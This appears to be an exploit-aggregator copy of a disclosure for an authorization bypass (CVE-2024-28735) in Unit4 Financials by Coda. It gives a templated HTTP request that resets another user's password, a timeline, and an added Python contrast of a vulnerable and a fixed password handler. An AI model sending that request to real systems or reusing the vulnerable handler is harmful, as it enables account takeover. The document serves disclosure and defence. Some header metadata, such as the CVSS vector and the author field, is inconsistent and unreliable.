Financials By Coda Authorization Bypass

CVE: CVE-2024-28735
Category: CWE-284
Price: $5000
Severity: Critical
Author: Security Researcher X
Risk: Critical
Exploitation Type: Remote
Date: 2024-03-16
CPE: cpe:/a:financials-coda:1.0.0
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.01234
EPSSP: 0.75291

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030036

Below is a copy:

Financials By Coda Authorization Bypass
# Vulnerability type: Incorrect Access Control
# Vendor: https://www.unit4.com/
# Product: Financials by Coda
# Product site: https://www.unit4.com/fr/products/financial-management-software
# Affected version: < 2023Q4
# Fixed version: 2023Q4
# Credit: Lo DRAGHI
# CVE: CVE-2024-28735

# PROOF OF CONCEPT
The "Change Password" feature can be abused in order to modify the password of any user of the application.
The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.

POST /coda/rest/session/password HTTP/2
Host: <target>
<snip>

{
    "user": "<targeted_user>",
    "password": "<attacker_user_password>",
    "company": "<company>",
    "newPassword": "<new_password_for_targeted_user>",
    "tzOffset": 240
}
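To make the access-control defect concrete, here is an added illustration (not Unit4's code, and not the vendor's actual fix, which the advisory does not describe) of a password-change handler that reproduces the flaw next to a hardened version. The user store, field names beyond those in the request above, and the hashing scheme are constructed for the example; the hardened handler binds the target account to the authenticated session and re-verifies the current password against that same account.

```python
import hashlib
import hmac


def _hash(password: str, salt: bytes) -> bytes:
    # Low iteration count keeps the example fast; raise it in real code.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


def make_store() -> dict:
    # Constructed in-memory accounts; two ordinary users in one company.
    return {
        "alice": {"salt": b"salt-a", "hash": _hash("alice-pw", b"salt-a"), "company": "ACME"},
        "bob": {"salt": b"salt-b", "hash": _hash("bob-pw", b"salt-b"), "company": "ACME"},
    }


def verify(store: dict, username: str, password: str) -> bool:
    rec = store.get(username)
    if rec is None:
        return False
    return hmac.compare_digest(rec["hash"], _hash(password, rec["salt"]))


def change_password_vulnerable(store: dict, session_user: str, body: dict) -> int:
    """Mirrors the advisory: the current password is checked against the
    caller's own account, but the new password is written to whichever
    account the request body names (CWE-284 style missing authorization)."""
    if not verify(store, session_user, body["password"]):
        return 401
    target = store.get(body["user"])
    if target is None:
        return 404
    target["hash"] = _hash(body["newPassword"], target["salt"])
    return 200


def change_password_fixed(store: dict, session_user: str, body: dict) -> int:
    """Hardened: the target is the session user, never a client-supplied name,
    and the current password must match that same account."""
    if body["user"] != session_user:
        return 403
    rec = store[session_user]
    if body["company"] != rec["company"] or not verify(store, session_user, body["password"]):
        return 401
    rec["hash"] = _hash(body["newPassword"], rec["salt"])
    return 200
```

A regression test for the fix should assert that a request naming another user is refused and leaves that user's credential unchanged, while a self-service change still succeeds.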

# TIMELINE
 30/10/2023: Vulnerability found
 02/11/2023: Vendor informed
 05/12/2023: Vendor fixed the issue
 14/03/2024: Public disclosure
